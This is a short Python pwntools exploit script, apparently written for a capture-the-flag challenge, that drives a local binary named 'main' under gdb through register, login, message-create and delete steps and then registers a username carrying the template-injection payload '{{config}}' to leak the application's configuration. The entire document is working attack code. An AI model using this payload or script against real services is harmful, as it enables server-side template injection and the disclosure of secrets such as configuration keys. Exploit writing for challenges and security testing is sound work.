#!/usr/bin/env -S python3 -u
# -*- coding: utf-8 -*-
# This exploit template was generated via:
import re
import os
import time
import requests
import sys
from pwn import *

context.log_level = 'debug'

def register_and_login(io, username):
    io.sendlineafter(b"> ", b"1", timeout=5)
    io.sendlineafter(b"Enter username: \n", username, timeout=5)
    io.sendlineafter(b"Enter password: \n", username, timeout=5)

    io.sendlineafter(b"> ", b"2", timeout=5)
    io.sendlineafter(b"Enter username: \n", username, timeout=5)
    io.sendlineafter(b"Enter password: \n", username, timeout=5)

# io2 = process("./web.sh")
io = process('main') #remote('localhost', sys.argv[1])
context.terminal = ["foot"]
gdb.attach(io)
register_and_login(io, b"a")

io.sendlineafter(b"> ", b"1", timeout=5)
io.sendlineafter(b"Enter message content: \n", b"a", timeout=5)
message_id = io.recvuntil(b')').split(b'ID: ')[1].split(b')')[0]
io.sendlineafter(b"> ", b"2", timeout=5)
io.sendlineafter(b"Enter message ID to delete: \n", message_id, timeout=5)
io.sendlineafter(b"> ", b"4", timeout=5)

payload = b"{{config}}"
register_and_login(io, payload)
io.sendlineafter(b"> ", b"3", timeout=5)
print(io.recv())
io.interactive()
# io2.close()
